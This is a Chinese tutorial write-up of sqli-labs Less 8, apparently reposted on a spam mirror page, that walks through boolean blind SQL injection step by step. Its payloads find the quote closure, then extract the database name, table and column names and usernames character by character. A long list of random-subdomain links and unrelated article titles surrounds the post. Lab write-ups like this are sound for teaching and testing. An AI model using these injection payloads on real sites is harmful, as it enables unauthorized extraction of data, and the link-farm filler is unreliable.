当前位置: 首页 > wzjs >正文

网站开发所涉及的技术公司管理系统软件有哪些

网站开发所涉及的技术,公司管理系统软件有哪些,网站开发 网络工程 哪个好,wordpress调用页面列表文章目录 sqli-labs靶场less 8 布尔盲注 sqli-labs靶场 每道题都从以下模板讲解,并且每个步骤都有图片,清晰明了,便于复盘。 sql注入的基本步骤 注入点注入类型 字符型:判断闭合方式 (‘、"、’、“”&#xf…

文章目录

  • sqli-labs靶场
    • less 8 布尔盲注


sqli-labs靶场

每道题都从以下模板讲解,并且每个步骤都有图片,清晰明了,便于复盘。

sql注入的基本步骤

  • 注入点
  • 注入类型
    • 字符型:判断闭合方式 (‘、"、’'、“”)
    • 数字型
  • 根据实际情况,选择合适的注入方式
  • 获取数据库名,表名,列名,数据

less 8 布尔盲注

数据库名长度-》数据库库名
指定数据库中表的个数-》 表名长度-》 表名
指定表中的字段个数-》 字段长度-》 字段名
指定表中该字段有多少条记录-》 数据长度-》 数据内容

  • 题目类型: 字符型 ’ 闭合

id=1和id=1/0 无变化
id=1’不显示You are in
id=1’’ id=1’‘’ id=1’‘’’ 并且呈规律性变化
id=1’–+ 正常回显 所以是字符型注入

在这里插入图片描述
在这里插入图片描述

id=1’–+ 正常回显 所以是字符型注入

在这里插入图片描述

通过以上判断注入类型和闭合方式,可以看到页面只呈现真假二个页面,所以适合使用布尔盲注
先构造轮子
id=1’ and 1 --+
true页面
在这里插入图片描述
id=1’ and 0 --+
false页面在这里插入图片描述
对轮子变形
id=1’ and length(“abcd”) = 4 --+
轮子正确
在这里插入图片描述
替换轮子
1、判断当前数据库

(1)判断数据库名长度
id=1’ and length(database()) =n --+
n表示使用数据库名的长度,对n进行爆破
可见长度为8
在这里插入图片描述

(2)猜数据库名
id=1’ and substr(database(),1,1)=‘s’ --+
在这里插入图片描述
可以看到大小写都盲注成功
在这里插入图片描述

数据名是 security

在这里插入图片描述

2、判断指定库的所有表

(1)判断当前库有多少个表

id=1’ and (select count(table_name) from information_schema.tables where table_schema=“security” ) = 4–+
在这里插入图片描述

在这里插入图片描述
(2)判断指定库中第n个表名最多有几个字母
开始判断第1个表名最多有几个字母

id=1’ and length( (select table_name from information_schema.tables where table_schema=‘security’ limit 0,1 ) )=6 --+
判断得到第1个表名有6个字母

在这里插入图片描述
(3)猜指定库中第n个表名
id=1’ and substr((select table_name from information_schema.tables
where table_schema=“security” limit 0,1),1,1)=‘e’ --+
在这里插入图片描述
在这里插入图片描述

3、判断指定库指定表的字段

(1)判断指定表中有几个字段
id=1’ and (select count(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)=3 --+

在这里插入图片描述
(2)判断指定库的指定表中的第n个字段最多有几个字母
id=1’ and length((select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1))=2 --+
在这里插入图片描述
(3)猜指定表中第n个字段名
id=1’ and substr((select column_name from information_schema.columns
where table_schema=“security” and table_name=‘users’ limit 0,1),1,1)=‘i’ --+

在这里插入图片描述
在这里插入图片描述

4、爆破内容

(1)判断内容中有几行数据

id=1’ and (select count(username) from users)=13 --+
在这里插入图片描述

(2)判断第n行记录最多有几个字母
id=1’ and length((select username from users limit 0,1))=4 --+
在这里插入图片描述

(3)猜数据内容

id=1’ and substr((select username from users limit 0,1),1,1)=‘D’ --+

MySQL数据库,不区分大小写,Dump和DUMP都可以
在这里插入图片描述

在这里插入图片描述



文章转载自:

http://srDcllSL.qczpf.cn
http://6as1YYQn.qczpf.cn
http://xcYS6Ci9.qczpf.cn
http://j0NfG3yU.qczpf.cn
http://v6nrVMb3.qczpf.cn
http://JjQTdQV3.qczpf.cn
http://BydymWgW.qczpf.cn
http://ivPjMrZf.qczpf.cn
http://2YT2hDGw.qczpf.cn
http://ad7x4QxT.qczpf.cn
http://84eGKv1e.qczpf.cn
http://V2107hxm.qczpf.cn
http://1aLsdSAp.qczpf.cn
http://GkgaYLfa.qczpf.cn
http://8scWDKJD.qczpf.cn
http://cVcOrDZp.qczpf.cn
http://ytdBCKE5.qczpf.cn
http://AZs5zZs5.qczpf.cn
http://w3qo20DS.qczpf.cn
http://s0jXIdfY.qczpf.cn
http://NiZEUX2K.qczpf.cn
http://Fhjt932T.qczpf.cn
http://K5A4xmjV.qczpf.cn
http://FmKLMn1T.qczpf.cn
http://zJGpdhRc.qczpf.cn
http://fGOfnYRh.qczpf.cn
http://Wc2pHGDi.qczpf.cn
http://lhhnTh5b.qczpf.cn
http://nWPZRzCY.qczpf.cn
http://QtGYA7Fz.qczpf.cn
http://www.dtcms.com/wzjs/670353.html

相关文章:

  • 预付做网站订金怎么做账做自己的网站的一般步骤
  • aspnet做网站视频教程网站建设所需人力
  • 加强政务门户网站建设零基础网站建设教程
  • 网站建设安全技术网站优化建设上海
  • 江苏省住房和城乡建设部网站wordpress怎么在上面建几个分类
  • 工作室 网站经营性备案徐州市经济技术开发区建设局网站
  • 陕西网站建设设计wordpress中图片幻灯展示效果
  • dedecms 英文网站深圳龙岗做网站的
  • 如何建网站平台上海如何做网站
  • 做网站需要用什么系统网站做代理服务器
  • 天津大良网站建设平台兼职网站开发
  • 网站和域名花卉网站源码
  • 漫画网站建设上海互联网公司有哪些
  • 创建一个网站 站点根文件夹为php网站开发电子书
  • 南华网站建设做网站太麻烦了
  • 购物网站建设得背景dede购物网站
  • 鲅鱼圈网站在哪做商业空间设计的概念
  • wap网站发布网站建设评判标准
  • 芮城做网站的机构seosem是指什么意思
  • wordpress lamp 建站制作响应式网站报价
  • 公司主营网站开发怎么做账视屏网站开发者工具无视频文件
  • 网站点击量作用网站开发公司建网站
  • 网站开发开源架构厦门在哪个网站做用工报备
  • 公司做网站留言板什么是网站的空间
  • 做微网站多少钱强的小程序开发
  • 电脑建设网站在互联网访问C 建设个人网站
  • 成品ppt的网站免费直播有哪些网站体验提升思路
  • 做外贸网站注意什么官方网站下载6966
  • 苏州建站模板展示龙胜网站建设公司
  • 厦门网站建设680元win8风格手机网站模板